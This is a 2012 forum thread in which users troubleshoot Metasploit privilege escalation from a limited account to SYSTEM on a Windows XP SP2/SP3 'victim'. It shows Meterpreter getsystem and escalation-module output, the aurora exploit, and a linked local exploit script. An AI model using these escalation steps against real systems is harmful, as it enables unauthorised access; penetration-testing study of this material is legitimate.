bobbyb1980 Posted February 29, 2012 Share Posted February 29, 2012 Greetings fellow hackers. I am trying to figure out a way to open a meterpreter shell on a victim machine that is running a Windows XP limited user account. Getsystem and use priv only seem to be working for escalation from Admin to system, but I am trying to go from limited user to admin. I was using the uacbypass module for windows 7 limited user accounts, but can't find anything similar for XP. Any ideas? Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted February 29, 2012 Author Share Posted February 29, 2012 The target is SP2. Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted February 29, 2012 Author Share Posted February 29, 2012 To my knowledge getsystem will only get you system level privs if you already have Admin privs, it's not working to escalate a limited user account to Admin/Sys. Quote Link to comment Share on other sites More sharing options...
hexophrenic Posted February 29, 2012 Share Posted February 29, 2012 To my knowledge getsystem will only get you system level privs if you already have Admin privs, it's not working to escalate a limited user account to Admin/Sys. You are mostly right in that getsystem will typically get you system level privs, but then you can use incognito or migrate processes to obtain other user rights. However, on XP SP2 getsystem should work from any meterpreter session, at least it always has for me. I wish I could help more, but it sounds like a module is not working quite right for you. Are you running in trunk? Did you do a an msfupdate? Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted March 1, 2012 Author Share Posted March 1, 2012 Hey guys. Looks like only SP2 is vulnerable to this module. I tried several different modules and none of them work in SP3. Does anyone know a way to elevate a limited user account to either Admin/SYS in SP3? meterpreter > getuid Server username: testinglimited\limited meterpreter > meterpreter > run post/windows/escalate/getsystem [-] Post failed: Rex::Post::Meterpreter::RequestError priv_elevate_getsystem: Operation failed: Access is denied. [-] Call stack: [-] /opt/framework-4.0.0/msf3/lib/rex/post/meterpreter/extensions/priv/priv.rb:68:in `getsystem' [-] /opt/framework-4.0.0/msf3/modules/post/windows/escalate/getsystem.rb:59:in `run' meterpreter > run post/windows/escalate/ms10_092_schelevator [-] Windows XP (Build 2600, Service Pack 3). is not vulnerable. Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted March 1, 2012 Author Share Posted March 1, 2012 I found this Python script that will respawn a system/admin shell from a XP SP3 limited user account. I already have a meterpreter shell on the box. Goal is to get from limited user to admin/sys. http://www.exploit-db.com/exploits/18176/ The problem is, that I can't upload files via a meterpreter limited access shell. meterpreter > upload /tmp/ms11_080.py C:\\ [*] uploading : /tmp/ms11_080.py -> C:\ [-] core_channel_open: Operation failed: Access is denied. Any ideas? Quote Link to comment Share on other sites More sharing options...
hexophrenic Posted March 1, 2012 Share Posted March 1, 2012 Why not just "use privs" then "getsystem" at the prompt? What happens then? Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted March 1, 2012 Author Share Posted March 1, 2012 I've already posted the output. Doesn't work in SP3. Quote Link to comment Share on other sites More sharing options...
hexophrenic Posted March 1, 2012 Share Posted March 1, 2012 Don't know what else to tell you. I just fired up XP SP3 (I also know these work in SP2), ran the aurora exploit against it (ms10_002_aurora): meterpreter > getuid Server username: computer\user meterpreter > getsystem ...got system (via technique 4). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM Then I tried your method, using the module getsystem.rb explicitly and same thing more or less. meterpreter > getuid Server username: computer\user meterpreter > run post/windows/escalate/getsystem [+] Obtained SYSTEM via technique 4 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM Which exploit are you using? Which payload? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.